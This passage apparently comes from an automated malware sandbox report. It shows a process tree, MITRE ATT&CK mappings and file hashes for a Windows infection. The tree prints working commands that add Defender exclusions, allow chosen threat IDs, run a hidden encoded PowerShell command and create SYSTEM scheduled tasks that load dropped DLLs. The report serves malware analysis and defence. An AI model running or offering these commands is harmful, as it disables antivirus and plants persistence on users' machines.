    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:764
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BmOBxsKaWluAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BmOBxsKaWluAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DRQwZPGpU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DRQwZPGpU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bKUdTlwcmkUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bKUdTlwcmkUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vvJTKlMtnceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vvJTKlMtnceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vwqndnnCqxGqfSABTfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vwqndnnCqxGqfSABTfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KYFFuoIYyvHfTWVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KYFFuoIYyvHfTWVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fEUykjFFsOKYdLcIC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fEUykjFFsOKYdLcIC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nTjXzACBCqixAVUa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nTjXzACBCqixAVUa\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4244
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BmOBxsKaWluAC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3208
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BmOBxsKaWluAC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BmOBxsKaWluAC" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DRQwZPGpU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DRQwZPGpU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bKUdTlwcmkUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bKUdTlwcmkUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vvJTKlMtnceU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vvJTKlMtnceU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vwqndnnCqxGqfSABTfR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vwqndnnCqxGqfSABTfR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KYFFuoIYyvHfTWVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KYFFuoIYyvHfTWVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fEUykjFFsOKYdLcIC /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fEUykjFFsOKYdLcIC /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nTjXzACBCqixAVUa /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nTjXzACBCqixAVUa /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3256
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gPcmnMFhl" /SC once /ST 00:01:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:1584
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gPcmnMFhl"
  2⤵
  PID:4608
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gPcmnMFhl"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2776
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "MyLpWniagHGphKWhH" /SC once /ST 01:55:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nTjXzACBCqixAVUa\kBZNYZsLhboDOri\XBchmPW.exe\" 41 /nvuYdidTl 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:3180
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "MyLpWniagHGphKWhH"
  2⤵
  PID:436
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 1396
  2⤵
  - Program crash
  PID:4972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:4132
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2996

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3180

C:\Windows\Temp\nTjXzACBCqixAVUa\kBZNYZsLhboDOri\XBchmPW.exe
C:\Windows\Temp\nTjXzACBCqixAVUa\kBZNYZsLhboDOri\XBchmPW.exe 41 /nvuYdidTl 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3100
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:3272
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:3372
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:404
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:228
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    PID:4356
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4976
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5044
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:4748
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      PID:3936
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2376
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:3464
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      PID:2776
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4604
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    PID:428
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:2040
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:552
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4316
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bJkMQFwoGoPsGTRxOv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3820
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    PID:3420
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:2560
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4932
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:2092
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\DRQwZPGpU\ZyxrPm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "CMdNcilRtZJtVJk" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:4312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "CMdNcilRtZJtVJk2" /F /xml "C:\Program Files (x86)\DRQwZPGpU\oSBEHQL.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6396
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "CMdNcilRtZJtVJk"
  2⤵
  PID:6348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "CMdNcilRtZJtVJk"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6412
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ecBSQnzmQsCPjd" /F /xml "C:\Program Files (x86)\vvJTKlMtnceU2\gzdoibS.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6064
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yNGaklqelgrGH2" /F /xml "C:\ProgramData\KYFFuoIYyvHfTWVB\hjSnGBa.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6536
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "okRkZpXOahVkIYVCn2" /F /xml "C:\Program Files (x86)\vwqndnnCqxGqfSABTfR\ftKgIfu.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "vlObFOmtRwZJWIqtdNk2" /F /xml "C:\Program Files (x86)\BmOBxsKaWluAC\PgtuKRH.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2392
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VaqCHCHYKjmSnwqMg" /SC once /ST 01:41:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nTjXzACBCqixAVUa\BKNcUTvC\zjtYEoq.dll\",#1 /knrdidgxJj 525403" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:6760
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "VaqCHCHYKjmSnwqMg"
  2⤵
  PID:6916
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "MyLpWniagHGphKWhH"
  2⤵
  PID:2024
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3100 -s 2324
  2⤵
  - Program crash
  PID:404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4664 -ip 4664
1⤵
PID:1584

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nTjXzACBCqixAVUa\BKNcUTvC\zjtYEoq.dll",#1 /knrdidgxJj 525403
1⤵
PID:6996
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nTjXzACBCqixAVUa\BKNcUTvC\zjtYEoq.dll",#1 /knrdidgxJj 525403
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:4932
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "VaqCHCHYKjmSnwqMg"
    3⤵
    PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4220 -ip 4220
1⤵
PID:5528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3100 -ip 3100
1⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6336

C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:6380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indirect Command Execution

T1202

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.0MB

MD5
82d2d8b7428cbf3b3160b690b82544e7

SHA1
1416d506e892e451db9e4a5372a0fa0ca06c72a2

SHA256
ed24096203815101cff08dfc9a95e4965549e054ba3dad64390613184057b667

SHA512
ce7402d4f7a0ed220803f5f64f683e9071e5b24cbf9e92bc7ac72b344e33f2f287c60bae8ed31531d2750cda87581a65915121d754279dadc09d28e6da5cc8d8

Download Submit
C:\ProgramData\Bside Multimeter 8.6.66\Bside Multimeter 8.6.66.exe

Filesize
3.5MB

MD5
deaedcf55765c5ace1d539c6206b0108

SHA1
fa47c874a3b885f4f2655e65a739c4fa59e61d4f

SHA256
eec54a6f205b10c885116e32b012499d677b820d812bdd18a60b4f85f0ccd776

SHA512
794086328b0b0e24c1b04708b4b87f15033ffe07ff4f75d64834ee774a5615ca83f8a0f3087c8cd0eeecd5043253c2851d5b34b729fe5e4ab79945372f1967b5

Download Submit
C:\Users\Admin\1000037002\752612fd8e.exe

Filesize
2.5MB

MD5
d90f73c7ff1684b33e76141951e709a3

SHA1
2508afb0008ca21997a6bc449fb7feb48529d941

SHA256
95a742a546546bce1590d9ac8cb15c5a681593688133d6d92680bbf9ee299f36

SHA512
96620a7a6a4d8781caffe1733107d15aaa005944e75f434c1ee53a5d0ce356255e4f8b688aeda639b70c93503cd0925f2b9c1234fc1464f17478d97eb84ec724

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_US\messages.json

Filesize
187B

MD5
